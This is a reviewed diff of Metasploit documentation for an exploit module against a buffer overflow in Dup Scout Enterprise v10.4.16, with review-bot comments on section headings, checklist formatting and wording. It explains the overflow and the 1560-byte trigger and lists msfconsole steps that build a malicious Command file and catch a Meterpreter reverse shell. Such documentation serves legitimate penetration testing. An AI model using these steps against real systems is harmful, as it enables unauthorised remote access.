documentation/modules/exploit/windows/fileformat/dupscout_xml.md (21 additions, 20 deletions)
@@ -1,24 +1,8 @@
1
-
## Overview
1
+
## Description
2
2
3
3
This module exploits a buffer overflow in libpal.dll that is used by [Dup Scout Enterprise v10.4.16](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe). The buffer overflow occurs during a call to the SCA_XmlParser::GetToken function when a user-supplied Command file with a crafted name attribute is imported to the Dup Scout application. The SCA_XmlParser::GetToken function is passed a heap pointer as an argument, which was created by the SCA_XmlParser::LoadXmlFile function and contains data from the user-supplied Command file, and a pointer to a stack buffer that was created in the SCA_XmlParser::ParseXmlElement function. While parsing the name attribute, the SCA_XmlParser::GetToken function copies from the heap buffer to the stack buffer until a single quote (to match name=', or a double quote to match name=") is found or until it finishes reading from the allocated heap buffer.
4
4
5
-
## Verification Steps
6
-
7
-
-[ ] Install Dup Scout Enterprise on target system
8
-
-[ ]`./msfconsole`
9
-
-[ ]`use exploit/windows/fileformat/dupscout_xml`
10
-
-[ ]`set payload windows/meterpreter/reverse_tcp`
11
-
-[ ]`set lhost <lhost>`
12
-
-[ ]`run`
13
-
-[ ]`use exploit/multi/handler`
14
-
-[ ]`set payload windows/meterpreter/reverse_tcp`
15
-
-[ ]`set lhost <lhost>`
16
-
-[ ]`run`
17
-
-[ ] From the DupScout Enterprise menu select Command -> Import Command
18
-
-[ ] Select file generated by metasploit
19
-
-[ ] Get a session
20
-
21
-
## Exploiting the Vulnerability
5
+
## Vulnerable Application
22
6
23
7
The vulnerability can be exploited when the size of the name attribute is greater than 1560 bytes.
24
8
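Review bot: the renamed `## Vulnerable Application` heading at the end of this hunk lands directly above "The vulnerability can be exploited when the size of the name attribute is greater than 1560 bytes." and the `buf << ...` construction that follows, which is exploitation detail rather than a description of the affected software. The module documentation template uses Vulnerable Application for the product, affected version and where to get it, so consider moving the "Dup Scout Enterprise v10.4.16" version and installer link out of the Description paragraph into this section and keeping the offset and buffer-layout explanation under its previous "Exploiting the Vulnerability" heading (or a subheading beneath Vulnerable Application). Separately, the last sentence of the Description lists only the termination conditions of the copy (matching quote or end of the heap buffer); it should say outright that the copy into the stack buffer is not bounded by that buffer's size, since that is the overflow.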
@@ -41,9 +25,26 @@ buf << payload # Location that is jumped to
41
25
42
26
Note: The last make_nops will offset the location of the payload. The offset is included to account for writes to the stack buffer that after the user-supplied Command file has been processed.
43
27
44
-
## Example Execution
28
+
## Verification Steps
29
+
30
+
-[ ] Install Dup Scout Enterprise on target system
31
+
-[ ]`./msfconsole`
32
+
-[ ]`use exploit/windows/fileformat/dupscout_xml`
33
+
-[ ]`set payload windows/meterpreter/reverse_tcp`
34
+
-[ ]`set lhost <lhost>`
35
+
-[ ]`run`
36
+
-[ ]`use exploit/multi/handler`
37
+
-[ ]`set payload windows/meterpreter/reverse_tcp`
38
+
-[ ]`set lhost <lhost>`
39
+
-[ ]`run`
40
+
-[ ] From the DupScout Enterprise menu select Command -> Import Command
41
+
-[ ] Select file generated by metasploit
42
+
-[ ] Get a session
43
+
44
+
45
+
## Scenarios
45
46
46
-
This exploit was tested on Windows 7 SP1 x64.
47
+
### Dup Scout Enterprise v10.4.16 Windows 7 SP1 x64.
47
48
48
49
```
49
50
msf5 > use exploit/windows/fileformat/dupscout_xml
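Review bot: the re-added Verification Steps will not render as a checklist: Markdown task-list items need a space after the dash and after the checkbox, i.e. `- [ ] `./msfconsole``, but these lines use `-[ ]`./msfconsole`` with no spacing, so they appear as literal text. Drop the trailing period from the new `### Dup Scout Enterprise v10.4.16 Windows 7 SP1 x64.` subheading as well. While this block is being moved, the unchanged note above it ("writes to the stack buffer that after the user-supplied Command file has been processed") is missing a verb, probably "occur".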